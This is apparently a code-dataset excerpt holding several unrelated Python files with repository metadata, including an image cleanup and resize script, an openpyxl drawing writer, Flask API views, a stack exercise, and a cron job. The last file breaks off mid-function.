| 44.145881 | 431 | 0.637668 | 7,794 | 58,405 | 4.664101 | 0.15204 | 0.01513 | 0.008775 | 0.005777 | 0.258445 | 0.199879 | 0.155507 | 0.118756 | 0.112263 | 0.104176 | 0 | 0.028468 | 0.248198 | 58,405 | 1,322 | 432 | 44.179274 | 0.799426 | 0.280883 | 0 | 0.261301 | 0 | 0.017641 | 0.224164 | 0.007597 | 0 | 0 | 0 | 0.001513 | 0 | 1 | 0.041896 | false | 0.012128 | 0.036384 | 0.001103 | 0.179713 | 0.089305 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
ad913bd95aa72f25fb5ddbcc5d7a7d7533605cc4 | 2,475 | py | Python | file_number_remove_resize.py | sshhoo/ica | 6bf982b22633e18157491b32a6815d898557ccf9 | [
"Apache-2.0"
] | null | null | null | file_number_remove_resize.py | sshhoo/ica | 6bf982b22633e18157491b32a6815d898557ccf9 | [
"Apache-2.0"
] | null | null | null | file_number_remove_resize.py | sshhoo/ica | 6bf982b22633e18157491b32a6815d898557ccf9 | [
"Apache-2.0"
] | null | null | null | import os
import argparse
import imghdr
from PIL import Image
from PIL import ImageFile
import tensorflow as tf
assert tf.__version__.startswith('2')
parser=argparse.ArgumentParser()
parser.add_argument('--file_number',type=int,default=10000000000000,help='file number')
parser.add_argument('--image_dir',type=str,default='_',help='Path to folders of images.')
parser.add_argument('--resize_int',type=int,default=-1,help='resize integer')
args=parser.parse_args()
#Image loadable
ImageFile.LOAD_TRUNCATED_IMAGES=True
if args.image_dir!='_':
if args.image_dir[-1]!='/':
print('Add / as the last character, please.')
print(args.image_dir)
sys.exit(1)
if args.resize_int!=-1:
resize_dir_name=args.image_dir.split('/')[0]
if not os.path.exists(f'{args.resize_int}_resized_{resize_dir_name}/'):
os.makedirs(f'{args.resize_int}_resized_{resize_dir_name}/')
for (dir,subs,files) in os.walk(args.image_dir):
if dir==args.image_dir:
subdir_list=subs
for i in range(len(subdir_list)):
if not os.path.exists(f'{args.resize_int}_resized_{resize_dir_name}/{subdir_list[i]}/'):
os.makedirs(f'{args.resize_int}_resized_{resize_dir_name}/{subdir_list[i]}/')
for (dir,subs,files) in os.walk(args.image_dir):
count=0
for file in files:
target=os.path.join(dir,file)
if os.path.isfile(target):
if imghdr.what(target)!=None:
target_list=target.split('/')
target_list[0]=f'{args.resize_int}_resized_{resize_dir_name}'
if os.path.isfile('/'.join(target_list)):
continue
try:
#tensorflow
img_raw=tf.io.read_file(target)
img_tensor=tf.image.decode_image(img_raw)
if count>=args.file_number:
print(target)
os.remove(target)
else:
try:
#Pillow
img=Image.open(target)
img_resize=img.resize((args.resize_int,args.resize_int))
try:
img_resize.save('/'.join(target_list))
try:
#resize tensorflow
img_raw_resize=tf.io.read_file('/'.join(target_list))
img_tensor_resize=tf.image.decode_image(img_raw_resize)
count+=1
except:
print('/'.join(target_list))
os.remove('/'.join(target_list))
except:
print(target)
os.remove(target)
except:
print(target)
os.remove(target)
except:
print(target)
os.remove(target)
else:
print(target)
os.remove(target)
| 31.329114 | 90 | 0.661414 | 353 | 2,475 | 4.413598 | 0.249292 | 0.05199 | 0.066752 | 0.044929 | 0.330552 | 0.314506 | 0.262516 | 0.262516 | 0.240693 | 0.240693 | 0 | 0.011564 | 0.196364 | 2,475 | 78 | 91 | 31.730769 | 0.771745 | 0.01899 | 0 | 0.318841 | 0 | 0 | 0.159653 | 0.104373 | 0 | 0 | 0 | 0 | 0.014493 | 1 | 0 | false | 0 | 0.086957 | 0 | 0.086957 | 0.115942 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
ad917964c0bed6a62931103a9b3b7267906cdf8c | 11,666 | py | Python | flask/lib/python3.6/site-packages/openpyxl/writer/drawings.py | JOFLIX/grapevines | 34576e01184570d79cc140b42ffb71d322132da6 | [
"MIT",
"Unlicense"
] | 8 | 2016-05-27T12:13:16.000Z | 2019-08-05T13:49:11.000Z | flask/lib/python3.6/site-packages/openpyxl/writer/drawings.py | JOFLIX/grapevines | 34576e01184570d79cc140b42ffb71d322132da6 | [
"MIT",
"Unlicense"
] | 3 | 2019-07-29T09:47:34.000Z | 2019-07-29T09:47:35.000Z | flask/lib/python3.6/site-packages/openpyxl/writer/drawings.py | JOFLIX/grapevines | 34576e01184570d79cc140b42ffb71d322132da6 | [
"MIT",
"Unlicense"
] | 1 | 2021-07-21T00:07:30.000Z | 2021-07-21T00:07:30.000Z | # coding=UTF-8
from __future__ import absolute_import
# Copyright (c) 2010-2014 openpyxl
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
# @license: http://www.opensource.org/licenses/mit-license.php
# @author: see AUTHORS file
from openpyxl.xml.functions import Element, SubElement, tostring
from openpyxl.xml.constants import (
DRAWING_NS,
SHEET_DRAWING_NS,
CHART_NS,
REL_NS,
CHART_DRAWING_NS,
PKG_REL_NS
)
from openpyxl.compat.strings import safe_string
class DrawingWriter(object):
""" one main drawing file per sheet """
def __init__(self, sheet):
self._sheet = sheet
def write(self):
""" write drawings for one sheet in one file """
root = Element("{%s}wsDr" % SHEET_DRAWING_NS)
for idx, chart in enumerate(self._sheet._charts):
self._write_chart(root, chart, idx+1)
for idx, img in enumerate(self._sheet._images):
self._write_image(root, img, idx+1)
return tostring(root)
def _write_chart(self, node, chart, idx):
"""Add a chart"""
drawing = chart.drawing
#anchor = SubElement(root, 'xdr:twoCellAnchor')
#(start_row, start_col), (end_row, end_col) = drawing.coordinates
## anchor coordinates
#_from = SubElement(anchor, 'xdr:from')
#x = SubElement(_from, 'xdr:col').text = str(start_col)
#x = SubElement(_from, 'xdr:colOff').text = '0'
#x = SubElement(_from, 'xdr:row').text = str(start_row)
#x = SubElement(_from, 'xdr:rowOff').text = '0'
#_to = SubElement(anchor, 'xdr:to')
#x = SubElement(_to, 'xdr:col').text = str(end_col)
#x = SubElement(_to, 'xdr:colOff').text = '0'
#x = SubElement(_to, 'xdr:row').text = str(end_row)
#x = SubElement(_to, 'xdr:rowOff').text = '0'
# we only support absolute anchor atm (TODO: oneCellAnchor, twoCellAnchor
x, y, w, h = drawing.get_emu_dimensions()
anchor = SubElement(node, '{%s}absoluteAnchor' % SHEET_DRAWING_NS)
SubElement(anchor, '{%s}pos' % SHEET_DRAWING_NS, {'x':str(x), 'y':str(y)})
SubElement(anchor, '{%s}ext' % SHEET_DRAWING_NS, {'cx':str(w), 'cy':str(h)})
# graph frame
frame = SubElement(anchor, '{%s}graphicFrame' % SHEET_DRAWING_NS, {'macro':''})
name = SubElement(frame, '{%s}nvGraphicFramePr' % SHEET_DRAWING_NS)
SubElement(name, '{%s}cNvPr'% SHEET_DRAWING_NS, {'id':'%s' % (idx + 1), 'name':'Chart %s' % idx})
SubElement(name, '{%s}cNvGraphicFramePr' % SHEET_DRAWING_NS)
frm = SubElement(frame, '{%s}xfrm' % SHEET_DRAWING_NS)
# no transformation
SubElement(frm, '{%s}off' % DRAWING_NS, {'x':'0', 'y':'0'})
SubElement(frm, '{%s}ext' % DRAWING_NS, {'cx':'0', 'cy':'0'})
graph = SubElement(frame, '{%s}graphic' % DRAWING_NS)
data = SubElement(graph, '{%s}graphicData' % DRAWING_NS, {'uri':CHART_NS})
SubElement(data, '{%s}chart' % CHART_NS, {'{%s}id' % REL_NS:'rId%s' % idx })
SubElement(anchor, '{%s}clientData' % SHEET_DRAWING_NS)
return node
def _write_anchor(self, node, drawing):
x, y, w, h = drawing.get_emu_dimensions()
if drawing.anchortype == "oneCell":
anchor = SubElement(node, '{%s}oneCellAnchor' % SHEET_DRAWING_NS)
xdrfrom = SubElement(anchor, '{%s}from' % SHEET_DRAWING_NS)
SubElement(xdrfrom, '{%s}col' % SHEET_DRAWING_NS).text = safe_string(drawing.anchorcol)
SubElement(xdrfrom, '{%s}colOff' % SHEET_DRAWING_NS).text = safe_string(x)
SubElement(xdrfrom, '{%s}row' % SHEET_DRAWING_NS).text = safe_string(drawing.anchorrow)
SubElement(xdrfrom, '{%s}rowOff' % SHEET_DRAWING_NS).text = safe_string(y)
else:
anchor = SubElement(node, '{%s}absoluteAnchor' % SHEET_DRAWING_NS)
SubElement(anchor, '{%s}pos' % SHEET_DRAWING_NS, {'x':safe_string(x), 'y':safe_string(y)})
SubElement(anchor, '{%s}ext' % SHEET_DRAWING_NS, {'cx':safe_string(w), 'cy':safe_string(h)})
return anchor
def _write_image(self, node, img, idx):
anchor = self._write_anchor(node, img.drawing)
pic = SubElement(anchor, '{%s}pic' % SHEET_DRAWING_NS)
name = SubElement(pic, '{%s}nvPicPr' % SHEET_DRAWING_NS)
SubElement(name, '{%s}cNvPr' % SHEET_DRAWING_NS,
{'id':'%s' % (idx + 1),
'name':'Picture %s' % idx})
cNvPicPr = SubElement(name, '{%s}cNvPicPr' % SHEET_DRAWING_NS)
paras = {"noChangeAspect": "0"}
if img.nochangeaspect:
paras["noChangeAspect"] = "1"
if img.nochangearrowheads:
paras["noChangeArrowheads"] = "1"
SubElement(cNvPicPr, '{%s}picLocks' % DRAWING_NS, paras)
blipfill = SubElement(pic, '{%s}blipFill' % SHEET_DRAWING_NS)
SubElement(blipfill, '{%s}blip' % DRAWING_NS, {
'{%s}embed' % REL_NS: 'rId%s' % idx,
'cstate':'print'
})
SubElement(blipfill, '{%s}srcRect' % DRAWING_NS)
stretch = SubElement(blipfill, '{%s}stretch' % DRAWING_NS)
SubElement(stretch, '{%s}fillRect' % DRAWING_NS)
sppr = SubElement(pic, '{%s}spPr' % SHEET_DRAWING_NS, {'bwMode':'auto'})
frm = SubElement(sppr, '{%s}xfrm' % DRAWING_NS)
# no transformation
SubElement(frm, '{%s}off' % DRAWING_NS, {'x':'0', 'y':'0'})
SubElement(frm, '{%s}ext' % DRAWING_NS, {'cx':'0', 'cy':'0'})
prstGeom = SubElement(sppr, '{%s}prstGeom' % DRAWING_NS, {'prst':'rect'})
SubElement(prstGeom, '{%s}avLst' % DRAWING_NS)
SubElement(sppr, '{%s}noFill' % DRAWING_NS)
ln = SubElement(sppr, '{%s}ln' % DRAWING_NS, {'w':'1'})
SubElement(ln, '{%s}noFill' % DRAWING_NS)
SubElement(ln, '{%s}miter' % DRAWING_NS, {'lim':'800000'})
SubElement(ln, '{%s}headEnd' % DRAWING_NS)
SubElement(ln, '{%s}tailEnd' % DRAWING_NS, {'type':'none', 'w':'med', 'len':'med'})
SubElement(sppr, '{%s}effectLst' % DRAWING_NS)
SubElement(anchor, '{%s}clientData' % SHEET_DRAWING_NS)
def write_rels(self, chart_id, image_id):
root = Element("{%s}Relationships" % PKG_REL_NS)
i = 0
for i, chart in enumerate(self._sheet._charts):
attrs = {'Id' : 'rId%s' % (i + 1),
'Type' : '%s/chart' % REL_NS,
'Target' : '../charts/chart%s.xml' % (chart_id + i) }
SubElement(root, '{%s}Relationship' % PKG_REL_NS, attrs)
for j, img in enumerate(self._sheet._images):
attrs = {'Id' : 'rId%s' % (i + j + 1),
'Type' : '%s/image' % REL_NS,
'Target' : '../media/image%s.png' % (image_id + j) }
SubElement(root, '{%s}Relationship' % PKG_REL_NS, attrs)
return tostring(root)
class ShapeWriter(object):
""" one file per shape """
def __init__(self, shapes):
self._shapes = shapes
def write(self, shape_id):
root = Element('{%s}userShapes' % CHART_NS)
for shape in self._shapes:
anchor = SubElement(root, '{%s}relSizeAnchor' % CHART_DRAWING_NS)
xstart, ystart, xend, yend = shape.coordinates
_from = SubElement(anchor, '{%s}from' % CHART_DRAWING_NS)
SubElement(_from, '{%s}x' % CHART_DRAWING_NS).text = str(xstart)
SubElement(_from, '{%s}y' % CHART_DRAWING_NS).text = str(ystart)
_to = SubElement(anchor, '{%s}to' % CHART_DRAWING_NS)
SubElement(_to, '{%s}x' % CHART_DRAWING_NS).text = str(xend)
SubElement(_to, '{%s}y' % CHART_DRAWING_NS).text = str(yend)
sp = SubElement(anchor, '{%s}sp' % CHART_DRAWING_NS, {'macro':'', 'textlink':''})
nvspr = SubElement(sp, '{%s}nvSpPr' % CHART_DRAWING_NS)
SubElement(nvspr, '{%s}cNvPr' % CHART_DRAWING_NS, {'id':str(shape_id), 'name':'shape %s' % shape_id})
SubElement(nvspr, '{%s}cNvSpPr' % CHART_DRAWING_NS)
sppr = SubElement(sp, '{%s}spPr' % CHART_DRAWING_NS)
frm = SubElement(sppr, '{%s}xfrm' % DRAWING_NS,)
# no transformation
SubElement(frm, '{%s}off' % DRAWING_NS, {'x':'0', 'y':'0'})
SubElement(frm, '{%s}ext' % DRAWING_NS, {'cx':'0', 'cy':'0'})
prstgeom = SubElement(sppr, '{%s}prstGeom' % DRAWING_NS, {'prst':str(shape.style)})
SubElement(prstgeom, '{%s}avLst' % DRAWING_NS)
fill = SubElement(sppr, '{%s}solidFill' % DRAWING_NS, )
SubElement(fill, '{%s}srgbClr' % DRAWING_NS, {'val':shape.color})
border = SubElement(sppr, '{%s}ln' % DRAWING_NS, {'w':str(shape._border_width)})
sf = SubElement(border, '{%s}solidFill' % DRAWING_NS)
SubElement(sf, '{%s}srgbClr' % DRAWING_NS, {'val':shape.border_color})
self._write_style(sp)
self._write_text(sp, shape)
shape_id += 1
return tostring(root)
def _write_text(self, node, shape):
""" write text in the shape """
tx_body = SubElement(node, '{%s}txBody' % CHART_DRAWING_NS)
SubElement(tx_body, '{%s}bodyPr' % DRAWING_NS, {'vertOverflow':'clip'})
SubElement(tx_body, '{%s}lstStyle' % DRAWING_NS)
p = SubElement(tx_body, '{%s}p' % DRAWING_NS)
if shape.text:
r = SubElement(p, '{%s}r' % DRAWING_NS)
rpr = SubElement(r, '{%s}rPr' % DRAWING_NS, {'lang':'en-US'})
fill = SubElement(rpr, '{%s}solidFill' % DRAWING_NS)
SubElement(fill, '{%s}srgbClr' % DRAWING_NS, {'val':shape.text_color})
SubElement(r, '{%s}t' % DRAWING_NS).text = shape.text
else:
SubElement(p, '{%s}endParaRPr' % DRAWING_NS, {'lang':'en-US'})
def _write_style(self, node):
""" write style theme """
style = SubElement(node, '{%s}style' % CHART_DRAWING_NS)
ln_ref = SubElement(style, '{%s}lnRef' % DRAWING_NS, {'idx':'2'})
scheme_clr = SubElement(ln_ref, '{%s}schemeClr' % DRAWING_NS, {'val':'accent1'})
SubElement(scheme_clr, '{%s}shade' % DRAWING_NS, {'val':'50000'})
fill_ref = SubElement(style, '{%s}fillRef' % DRAWING_NS, {'idx':'1'})
SubElement(fill_ref, '{%s}schemeClr' % DRAWING_NS, {'val':'accent1'})
effect_ref = SubElement(style, '{%s}effectRef' % DRAWING_NS, {'idx':'0'})
SubElement(effect_ref, '{%s}schemeClr' % DRAWING_NS, {'val':'accent1'})
font_ref = SubElement(style, '{%s}fontRef' % DRAWING_NS, {'idx':'minor'})
SubElement(font_ref, '{%s}schemeClr' % DRAWING_NS, {'val':'lt1'})
| 43.529851 | 113 | 0.600463 | 1,457 | 11,666 | 4.630062 | 0.211393 | 0.122739 | 0.056033 | 0.021346 | 0.290098 | 0.265787 | 0.207086 | 0.148681 | 0.128817 | 0.117848 | 0 | 0.006182 | 0.237356 | 11,666 | 267 | 114 | 43.692884 | 0.752051 | 0.174181 | 0 | 0.11875 | 0 | 0 | 0.148791 | 0.004395 | 0 | 0 | 0 | 0.003745 | 0 | 1 | 0.0625 | false | 0 | 0.025 | 0 | 0.13125 | 0.00625 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
ad95ad8e3ed853f12dee35a35c4756b3a861699f | 2,244 | py | Python | server/views/topics/entities.py | rleir/MediaCloud-Web-Tools | 86fd42959bec2f24c74cf63277da1931a159b218 | [
"Apache-2.0"
] | null | null | null | server/views/topics/entities.py | rleir/MediaCloud-Web-Tools | 86fd42959bec2f24c74cf63277da1931a159b218 | [
"Apache-2.0"
] | null | null | null | server/views/topics/entities.py | rleir/MediaCloud-Web-Tools | 86fd42959bec2f24c74cf63277da1931a159b218 | [
"Apache-2.0"
] | null | null | null | import logging
from flask import jsonify
import flask_login
from server import app
from server.auth import user_mediacloud_key
from server.util.tags import CLIFF_PEOPLE, CLIFF_ORGS, processed_for_entities_tag_ids
from server.util.request import api_error_handler
from server.views.topics.apicache import topic_tag_coverage, topic_tag_counts
import server.util.csv as csv
logger = logging.getLogger(__name__)
DEFAULT_DISPLAY_AMOUNT = 50
ENTITY_DOWNLOAD_COLUMNS = ['tags_id', 'label', 'count', 'pct']
def process_tags_for_coverage(topics_id, tag_counts):
coverage = topic_tag_coverage(topics_id, processed_for_entities_tag_ids())
top_tag_counts = tag_counts[:DEFAULT_DISPLAY_AMOUNT]
for t in tag_counts: # add in pct to ALL counts, not top, so CSV download can include them
try:
t['pct'] = float(t['count']) / float(coverage['counts']['count'])
except ZeroDivisionError:
t['pct'] = 0
data = {
'entities': top_tag_counts,
'coverage': coverage['counts'],
}
return data
@app.route('/api/topics/<topics_id>/entities/people', methods=['GET'])
@flask_login.login_required
@api_error_handler
def topic_top_people(topics_id):
top_tag_counts = topic_tag_counts(user_mediacloud_key(), topics_id, CLIFF_PEOPLE)
data = process_tags_for_coverage(topics_id, top_tag_counts)
return jsonify(data)
@app.route('/api/topics/<topics_id>/entities/organizations', methods=['GET'])
@flask_login.login_required
@api_error_handler
def topic_top_orgs(topics_id):
top_tag_counts = topic_tag_counts(user_mediacloud_key(), topics_id, CLIFF_ORGS)
data = process_tags_for_coverage(topics_id, top_tag_counts)
return jsonify(data)
@app.route('/api/topics/<topics_id>/entities/<type_entity>/entities.csv', methods=['GET'])
@flask_login.login_required
def entities_csv(topics_id, type_entity):
tag_type = CLIFF_PEOPLE if type_entity == 'people' else CLIFF_ORGS
top_tag_counts = topic_tag_counts(user_mediacloud_key(), topics_id, tag_type)
data = process_tags_for_coverage(topics_id, top_tag_counts)
return csv.stream_response(data['entities'], ENTITY_DOWNLOAD_COLUMNS,
'topic-{}-entities-{}'.format(topics_id, type))
| 37.4 | 95 | 0.75 | 319 | 2,244 | 4.909091 | 0.247649 | 0.086207 | 0.061303 | 0.0447 | 0.442529 | 0.409323 | 0.369093 | 0.369093 | 0.345466 | 0.345466 | 0 | 0.001563 | 0.144385 | 2,244 | 59 | 96 | 38.033898 | 0.814063 | 0.029857 | 0 | 0.212766 | 0 | 0 | 0.115402 | 0.066207 | 0 | 0 | 0 | 0 | 0 | 1 | 0.085106 | false | 0 | 0.191489 | 0 | 0.361702 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
ad9609b2b9a236c2ab46994ebdb441f11cd465b2 | 1,380 | py | Python | code06-03.py | rcm2000/learn_algorithm | 0134176df8e5f5f46c67642212de8def58f4bef9 | [
"Apache-2.0"
] | null | null | null | code06-03.py | rcm2000/learn_algorithm | 0134176df8e5f5f46c67642212de8def58f4bef9 | [
"Apache-2.0"
] | null | null | null | code06-03.py | rcm2000/learn_algorithm | 0134176df8e5f5f46c67642212de8def58f4bef9 | [
"Apache-2.0"
] | null | null | null | ##함수
def isStckFull() :
global SIZE, stack,top
if top == SIZE -1:
return True
else:
return False
def push(data):
global SIZE, stack, top
if isStckFull():
print('스텍이 꽉찼습니다.')
return
top +=1
stack[top] = data
def isStackEmpty():
global SIZE, stack, top
if top <= - 1:
return True
else:
return False
def pop():
global SIZE, stack, top
if isStackEmpty():
print('스택이 없습니다.')
return
data = stack[top]
stack[top] = None
top -= 1
return data
def peek():
global SIZE, stack, top
if isStackEmpty():
print('스택이 없습니다.')
return None
return stack[top]
##전역변수
SIZE = 5
stack = [None for _ in range(SIZE)]
top = -1
select = -1
##메인
if __name__ =="__main__":
while(select != 4):
select = int(input("선택하세요(1:삽입,2:추출,3:확인,4.종료)-->"))
if(select == 1):
data = input('입력할 데이터----->')
push(data)
print('현 스택 상태',stack)
elif (select == 2):
data = pop()
print('추출 데이터 = ',data)
print('현 스택 상태', stack)
elif (select == 3):
data = peek()
print('확인된 데이터 =',data)
elif (select == 4):
print('현 스택 상태', stack)
exit
else:
print("1~4의 숫자만 이용가능합니다")
continue | 21.230769 | 60 | 0.486957 | 171 | 1,380 | 3.877193 | 0.327485 | 0.108597 | 0.113122 | 0.135747 | 0.447964 | 0.395173 | 0.325792 | 0.238311 | 0.15083 | 0.15083 | 0 | 0.020857 | 0.374638 | 1,380 | 65 | 61 | 21.230769 | 0.747393 | 0.005797 | 0 | 0.362069 | 0 | 0 | 0.097293 | 0.021214 | 0 | 0 | 0 | 0 | 0 | 1 | 0.086207 | false | 0 | 0 | 0 | 0.241379 | 0.155172 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
ad970dc4124339b7ef7f16d80790d68e5bfa52b7 | 892 | py | Python | astr-119-hw-2/dictionaries.py | talirrito/astr-119 | 22682b798b7a200fa8227539b42f2630f7f989b0 | [
"MIT"
] | null | null | null | astr-119-hw-2/dictionaries.py | talirrito/astr-119 | 22682b798b7a200fa8227539b42f2630f7f989b0 | [
"MIT"
] | 7 | 2021-09-26T21:30:13.000Z | 2021-12-09T20:11:01.000Z | astr-119-hw-2/dictionaries.py | talirrito/astr-119 | 22682b798b7a200fa8227539b42f2630f7f989b0 | [
"MIT"
] | null | null | null | #define a dictionary data structure
#dictionaries are lists but with key value associations
#dictionaries have a key : value for the elements, like looking up a word in the dictionary
#in astronomy, will often depict catalogues as dictionary. difficult to use arrays instead of this.
example_dict = {
"class" : "Astr 119",
"prof" : "Brant",
"awesomeness" : 10 #note that the last element does NOT have a comma
}
print(type(example_dict)) # will say dict
#get a value via a key
course = example_dict["class"] #this will replace class" with "course
print(course)
#change a value via a key
example_dict["awesomeness"] += 1 #increase awesomeness
#print dictionary
print(example_dict)
#print dictionary element by element
for x in example_dict.keys(): #x equals to first key, 2nd, 3rd. print that key then print the value associated with that key.
print(x, example_dict[x]) | 37.166667 | 126 | 0.746637 | 139 | 892 | 4.741007 | 0.503597 | 0.116844 | 0.048558 | 0.030349 | 0.039454 | 0 | 0 | 0 | 0 | 0 | 0 | 0.01087 | 0.174888 | 892 | 24 | 127 | 37.166667 | 0.884511 | 0.668161 | 0 | 0 | 0 | 0 | 0.173145 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.333333 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
ad97cf54b23c3db9dc2e1530a9879f0edaf8a9be | 797 | py | Python | src/logger.py | gerritjandebruin/cargo-ship-noncompliance-assessment | 3781548920069351f4feb6aeac3c61d3839642d4 | [
"MIT"
] | null | null | null | src/logger.py | gerritjandebruin/cargo-ship-noncompliance-assessment | 3781548920069351f4feb6aeac3c61d3839642d4 | [
"MIT"
] | null | null | null | src/logger.py | gerritjandebruin/cargo-ship-noncompliance-assessment | 3781548920069351f4feb6aeac3c61d3839642d4 | [
"MIT"
] | null | null | null | import logging
from rich.logging import RichHandler
logger = logging.getLogger(__name__)
# the handler determines where the logs go: stdout/file
shell_handler = RichHandler()
# file_handler = logging.FileHandler("debug.log")
logger.setLevel(logging.INFO)
shell_handler.setLevel(logging.DEBUG)
# file_handler.setLevel(logging.DEBUG)
# the formatter determines what our logs will look like
fmt_shell = '%(message)s'
# fmt_file = '%(levelname)s %(asctime)s [%(filename)s:%(funcName)s:%(lineno)d] %(message)s'
shell_formatter = logging.Formatter(fmt_shell)
# file_formatter = logging.Formatter(fmt_file)
# here we hook everything together
shell_handler.setFormatter(shell_formatter)
# file_handler.setFormatter(file_formatter)
logger.addHandler(shell_handler)
# logger.addHandler(file_handler) | 29.518519 | 91 | 0.794228 | 105 | 797 | 5.838095 | 0.419048 | 0.078303 | 0.071778 | 0.088091 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.094103 | 797 | 27 | 92 | 29.518519 | 0.84903 | 0.544542 | 0 | 0 | 0 | 0 | 0.031073 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.2 | 0 | 0.2 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
ad990bc8eb53333ac7514239109a77427ece7ae4 | 912 | py | Python | transformer/cron.py | ulsdevteam/pisces | c3c6a513e8c29bf95673971b158828e1cc85c744 | [
"MIT"
] | 1 | 2019-05-13T21:05:20.000Z | 2019-05-13T21:05:20.000Z | transformer/cron.py | ulsdevteam/pisces | c3c6a513e8c29bf95673971b158828e1cc85c744 | [
"MIT"
] | 307 | 2019-04-03T13:11:57.000Z | 2022-03-16T21:57:35.000Z | transformer/cron.py | RockefellerArchiveCenter/pisces | 0fcdfd7a6055e6df58cc27058e31249cfe3ecca7 | [
"MIT"
] | null | null | null | from datetime import datetime
from django_cron import CronJobBase, Schedule
from .mappings import has_online_asset
from .models import DataObject
class CheckMissingOnlineAssets(CronJobBase):
code = "transformer.online_assets"
RUN_EVERY_MINS = 0
schedule = Schedule(run_every_mins=RUN_EVERY_MINS)
def do(self):
print("Checking for recently added assets at {}".format(datetime.now()))
for object in DataObject.objects.filter(object_type__in=["collection", "object"], online_pending=True).iterator():
if has_online_asset(object.es_id):
object.data["online"] = True
object.online_pending = False
object.indexed = False
object.save()
print("Online assets discovered for {}".format(object.es_id))
print("Finished checking for recently added assets at {}\n".format(datetime.now()))
| 38 | 122 | 0.678728 | 108 | 912 | 5.555556 | 0.481481 | 0.04 | 0.06 | 0.08 | 0.106667 | 0.106667 | 0 | 0 | 0 | 0 | 0 | 0.001414 | 0.224781 | 912 | 23 | 123 | 39.652174 | 0.847242 | 0 | 0 | 0 | 0 | 0 | 0.185307 | 0.027412 | 0 | 0 | 0 | 0 | 0 | 1 | 0.055556 | false | 0 | 0.222222 | 0 | 0.5 | 0.166667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
ad998c571e279c84a76646b4865a1eab29a24efc | 1,911 | py | Python | src/blueprints/server_routes.py | oppsec/flaskquotes | 49b6eec3fd996e649bdfa410f11532bd1c00ee70 | [
"MIT"
] | null | null | null | src/blueprints/server_routes.py | oppsec/flaskquotes | 49b6eec3fd996e649bdfa410f11532bd1c00ee70 | [
"MIT"
] | null | null | null | src/blueprints/server_routes.py | oppsec/flaskquotes | 49b6eec3fd996e649bdfa410f11532bd1c00ee70 | [
"MIT"
] | null | null | null | from flask import Blueprint
from flask import redirect
from flask import abort
from flask_login import current_user
from flask_login import logout_user
from utils.decorators import login_required
from utils.session import find_user
server_routes = Blueprint(name="server_routes",
import_name=__name__,
template_folder="templates")
@server_routes.route("/delete/<int:quote_id>")
@login_required
def remove_quote(quote_id: int):
"""Removes the given ID quote from the database.
Notes
-----
- If the user is anonymous, he is redirected to /login;
- If the user is not the owner of the quote, a 401 status is raised;
- If the quote does not exist, a 404 status code is raised.
"""
quote = current_user._quotes.filter_by(id=quote_id).first()
if quote not in current_user._quotes:
